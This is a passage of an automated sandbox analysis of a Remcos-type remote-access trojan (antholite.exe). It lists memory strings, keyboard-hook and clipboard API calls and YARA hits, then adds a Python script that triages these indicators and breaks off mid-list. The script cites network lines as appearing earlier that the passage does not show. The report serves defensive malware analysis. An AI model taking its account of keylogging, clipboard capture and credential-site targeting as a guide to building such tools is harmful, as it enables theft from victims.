Source: antholite.exe, 00000003.00000003.2160163689.000000000172D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: antholite.exe, 00000002.00000002.4551500867.0000000004DC0000.00000040.10000000.00040000.00000000.sdmp, antholite.exe, 00000005.00000002.2146630051.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: antholite.exe | String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: antholite.exe, 00000002.00000002.4551692085.0000000006900000.00000040.10000000.00040000.00000000.sdmp, antholite.exe, 00000003.00000002.2160545204.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: antholite.exe, 00000002.00000002.4551692085.0000000006900000.00000040.10000000.00040000.00000000.sdmp, antholite.exe, 00000003.00000002.2160545204.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                  Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
                  Source: antholite.exe, 00000002.00000003.2131579771.00000000011FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                  Source: antholite.exe, 00000002.00000003.2142233343.00000000011C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp)
                  Source: antholite.exe, 00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmp, antholite.exe, 00000002.00000002.4551036697.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, antholite.exe, 00000007.00000002.2233641554.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, antholite.exe, 00000007.00000002.2232850434.0000000000400000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: antholite.exe, 00000002.00000002.4550896942.00000000012A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpK
                  Source: antholite.exe, 00000002.00000003.2142233343.00000000011C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpM
                  Source: antholite.exe, 00000002.00000002.4550520256.0000000001177000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
                  Source: antholite.exe, 00000002.00000002.4550896942.00000000012A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpu
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0:
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0H
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0I
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://ocsp.msocsp.com0
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://ocsp.msocsp.com0S
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://ocspx.digicert.com0E
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://www.digicert.com/CPS0~
                  Source: antholite.exe, 00000002.00000002.4551500867.0000000004DC0000.00000040.10000000.00040000.00000000.sdmp, antholite.exe, 00000005.00000002.2146630051.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                  Source: antholite.exe, 00000002.00000002.4551500867.0000000004DC0000.00000040.10000000.00040000.00000000.sdmp, antholite.exe, 00000005.00000002.2147465927.000000000116D000.00000004.00000020.00020000.00000000.sdmp, antholite.exe, 00000005.00000002.2146630051.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                  Source: antholite.exe, 00000005.00000002.2147465927.000000000116D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
                  Source: antholite.exe, 00000002.00000002.4551500867.0000000004DC0000.00000040.10000000.00040000.00000000.sdmp, antholite.exe, 00000005.00000002.2146630051.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                  Source: antholite.exe, 00000002.00000002.4551500867.0000000004DC0000.00000040.10000000.00040000.00000000.sdmp, antholite.exe, 00000005.00000002.2146630051.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://www.msftconnecttest.com/connecttest.txt?n=1696428304750
                  Source: antholite.exe, 00000003.00000002.2160954992.00000000011F4000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                  Source: antholite.exe, 00000005.00000002.2146630051.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=P
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpX
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-LAX31r5a&FrontEnd=AF
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://fp-afd-nocache.azureedge.net/apc/trans.gif?77686a33b2eafa1538ef78c3be5a5910
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://fp-afd-nocache.azureedge.net/apc/trans.gif?caa2cf97cacae25a18f577703684ee65
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://fp-afd.azurefd.us/apc/trans.gif?0cf92be82316943650f2ee723bc6949e
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://fp-afd.azurefd.us/apc/trans.gif?94fb5ac9609bcb4cda0bf8acf1827073
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?7e9591e308dbda599df1fc08720a72a3
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?c6a2869c584d2ea23c67c44abe1ec326
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
                  Source: antholite.exe, 00000003.00000002.2160855466.0000000000A9C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://login.li
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                  Source: antholite.exeString found in binary or memory: https://login.yahoo.com/config/login
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://maps.windows.com/windows-app-web-link
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-04-14-10-35/PreSignInSettingsConfig.json
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=4954a0
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-0debb885be07c402c948.js
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ec3581b6c9e6e9985aa7.chunk.v7.js
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.6c288f9aff9797959103.chunk.v7.js
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.9ba2d4c9e339ba497e10.chunk.v7.js
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-1652fd8b358d589e6ec0.js
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.52c45571d19ede0a7005.chunk.v7.j
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.d918c7fc33e22b41b936.chunk.v7.c
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
                  Source: antholite.exe, 00000002.00000002.4551500867.0000000004DC0000.00000040.10000000.00040000.00000000.sdmp, antholite.exe, 00000005.00000002.2146630051.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: antholite.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://www.office.com/

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,000000002_2_0040A2F3
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_0077EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0077EAFF
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_0077ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0077ED6A
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,GlobalUnWire,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalFix,GlobalUnWire,CloseClipboard,2_2_004168FC
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0090ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_0090ED6A
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,3_2_0040987A
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,3_2_004098E2
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_0090ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,3_2_0090ED6A
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_0077EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0077EAFF
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_0076AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_0076AA57
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_00799576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00799576
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_00929576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_00929576
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_00929576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,3_2_00929576
                  Source: Yara matchFile source: 2.2.antholite.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.antholite.exe.3c00000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.antholite.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.antholite.exe.34e0000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.antholite.exe.3c00000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.antholite.exe.34e0000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4551036697.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2233641554.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2232850434.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: antholite.exe PID: 6364, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: antholite.exe PID: 6444, type: MEMORYSTR

                  E-Banking Fraud

                  barindex
                  Source: Yara matchFile source: 2.2.antholite.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.antholite.exe.3c00000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.antholite.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.antholite.exe.34e0000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.antholite.exe.3c00000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.antholite.exe.34e0000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000003.2135709723.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4550520256.0000000001177000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4551244504.0000000003DFF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.2168391666.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4550751358.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4551036697.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4550520256.0000000001148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2233512989.0000000001904000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.2169326996.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.2131579771.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.2141891064.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2233641554.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2232850434.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: antholite.exe PID: 6364, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: antholite.exe PID: 6444, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
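The behaviour lines above mix three kinds of evidence that deserve different weight: network events actually observed in the run (the Suricata alert, the DNS query and the GET /json.gp request), strings pulled from process memory and unpacked code, and strings from the dropped temp file bhvA838.tmp.3.dr, which are almost entirely DigiCert CRL/OCSP URLs and Microsoft login/Office CDN resources, i.e. browser and OS cache noise rather than indicators. The script below is an added triage example (not Joe Sandbox's own code and not part of this report) that parses a constructed subset of the lines copied from the sections above and tiers them: a host from memory is only "network confirmed" when the same name also appears in a DNS or HTTP line; strings from sources the report names with the ".dr" suffix (files dropped during the run) are kept apart as artifact noise. It also decodes the first argument of the SetWindowsHookExA call at 2_2_0040A2F3 (0x0D, which is WH_KEYBOARD_LL in winuser.h) and flags functions that both open the clipboard and call GetClipboardData. Two caveats for anyone reusing the output: geoplugin.net is a public geolocation service that Remcos queries at start-up, so the request corroborates the family but is not the C2 channel, and the alert's destination 178.237.33.50:80 is reported as-is because the report does not print the resolution, even though the only HTTP request in the run is the one to geoplugin.net. The regexes assume the fused column layout shown on this page ("Network trafficSuricata IDS: ...") and lowercase hostnames.

```python
"""Triage helper for Joe Sandbox behaviour lines (added example, not part of the report).

The sample lines below are copied from the report above; the parsing rules and the
confidence tiering are this example's own assumptions, not Joe Sandbox's.
"""
import re
from urllib.parse import urlsplit

# Hook types as passed to SetWindowsHookEx (values from winuser.h).
HOOK_TYPES = {2: "WH_KEYBOARD", 7: "WH_MOUSE", 13: "WH_KEYBOARD_LL", 14: "WH_MOUSE_LL"}
HOOK_APIS = {"SetWindowsHookExA", "SetWindowsHookExW"}

# The report prints table columns fused together ("global trafficDNS traffic detected: ..."),
# so each pattern anchors on the column label rather than on whitespace.
RE_SURICATA = re.compile(r"Suricata IDS: (\d+) - Severity (\d+) - (.+?) : ([\d.]+):(\d+) -> ([\d.]+):(\d+)$")
RE_HTTP = re.compile(r"HTTP traffic detected: (GET|POST) (\S+) HTTP/1\.[01]Host: ([a-z0-9.-]+)")
RE_DNS = re.compile(r"DNS query: ([a-z0-9.-]+)")
RE_STRING = re.compile(r"^Source: (.+?)String found in binary or memory: (\S+)")
RE_CODEFN = re.compile(r"Code function: (\S+) (.+?)\1$")  # the function id is repeated at the end
RE_DROPPED = re.compile(r"Yara matchFile source: (.+?), type: DROPPED$")

# Constructed sample: a subset of the lines from this report, verbatim.
REPORT_LINES = [
    "Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49706 -> 178.237.33.50:80",
    "Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache",
    "Source: global trafficDNS traffic detected: DNS query: geoplugin.net",
    "Source: antholite.exe, 00000002.00000003.2131579771.00000000011FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp",
    "Source: bhvA838.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0",
    "Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js",
    "Source: antholite.exe, 00000005.00000002.2146630051.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/",
    "Source: C:\\Users\\user\\AppData\\Local\\Cocles\\antholite.exeCode function: 2_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,000000002_2_0040A2F3",
    "Source: C:\\Users\\user\\AppData\\Local\\Cocles\\antholite.exeCode function: 2_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,GlobalUnWire,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalFix,GlobalUnWire,CloseClipboard,2_2_004168FC",
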